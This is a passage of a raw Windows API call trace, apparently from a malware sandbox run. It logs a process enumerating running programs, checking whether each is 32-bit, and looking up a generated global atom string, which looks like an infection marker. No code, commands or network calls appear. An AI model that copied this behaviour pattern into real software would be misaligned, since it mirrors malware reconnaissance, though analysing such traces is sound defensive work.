	[0074.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.592] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.593] CloseHandle (hObject=0x224) returned 1
	[0074.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728858, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.593] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.593] CloseHandle (hObject=0x224) returned 1
	[0074.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.593] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.593] CloseHandle (hObject=0x224) returned 1
	[0074.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.593] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.593] CloseHandle (hObject=0x224) returned 1
	[0074.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.594] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.594] CloseHandle (hObject=0x224) returned 1
	[0074.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.594] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.594] CloseHandle (hObject=0x224) returned 1
	[0074.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.594] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.594] CloseHandle (hObject=0x224) returned 1
	[0074.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.594] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.594] CloseHandle (hObject=0x224) returned 1
	[0074.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.594] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.595] CloseHandle (hObject=0x224) returned 1
	[0074.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.595] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.595] CloseHandle (hObject=0x224) returned 1
	[0074.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72eb08, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.595] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.595] CloseHandle (hObject=0x224) returned 1
	[0074.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.595] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.595] CloseHandle (hObject=0x224) returned 1
	[0074.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.595] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.595] CloseHandle (hObject=0x224) returned 1
	[0074.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.596] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.596] CloseHandle (hObject=0x224) returned 1
	[0074.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7288d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0074.596] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.596] CloseHandle (hObject=0x224) returned 1
	[0074.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.596] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.597] CloseHandle (hObject=0x224) returned 1
	[0074.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.597] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.597] CloseHandle (hObject=0x224) returned 1
	[0074.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.597] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.597] CloseHandle (hObject=0x224) returned 1
	[0074.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72eb30, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.597] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.597] CloseHandle (hObject=0x224) returned 1
	[0074.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.598] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.598] CloseHandle (hObject=0x224) returned 1
	[0074.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.598] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.598] CloseHandle (hObject=0x224) returned 1
	[0074.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728838, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.598] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.598] CloseHandle (hObject=0x224) returned 1
	[0074.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.598] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.598] CloseHandle (hObject=0x224) returned 1
	[0074.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728a18, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.598] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.598] CloseHandle (hObject=0x224) returned 1
	[0074.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.599] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.599] CloseHandle (hObject=0x224) returned 1
	[0074.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e6d0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.599] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.599] CloseHandle (hObject=0x224) returned 1
	[0074.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.599] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.600] GetLastError () returned 0x5
	[0074.601] GetLastError () returned 0x5
	[0074.601] GetLastError () returned 0x5
	[0074.601] GetLastError () returned 0x5
	[0074.601] GetLastError () returned 0x5
	[0074.601] GetLastError () returned 0x5
	[0074.601] GetLastError () returned 0x5
	[0074.601] GetLastError () returned 0x5
	[0074.601] GetLastError () returned 0x5
	[0074.601] GetLastError () returned 0x5
	[0074.601] GetLastError () returned 0x5
	[0074.601] GetLastError () returned 0x5
	[0074.601] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.611] GetLastError () returned 0x5
	[0074.612] GetLastError () returned 0x5
	[0074.612] GetLastError () returned 0x5
	[0074.612] GetLastError () returned 0x5
	[0074.612] GetLastError () returned 0x5
	[0074.612] GetLastError () returned 0x5
	[0074.612] GetLastError () returned 0x5
	[0074.612] GetLastError () returned 0x5
	[0074.612] GetLastError () returned 0x5
	[0074.612] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.613] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.613] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.613] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.614] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetLastError () returned 0x5
	[0074.615] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.615] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.615] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.615] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.615] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.615] CloseHandle (hObject=0x224) returned 1
	[0074.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.616] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.616] CloseHandle (hObject=0x224) returned 1
	[0074.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.617] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.617] CloseHandle (hObject=0x224) returned 1
	[0074.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772170, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16d18) returned 0xc0000004
	[0074.654] VirtualAlloc (lpAddress=0x0, dwSize=0x16e18, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16e18, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772188, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
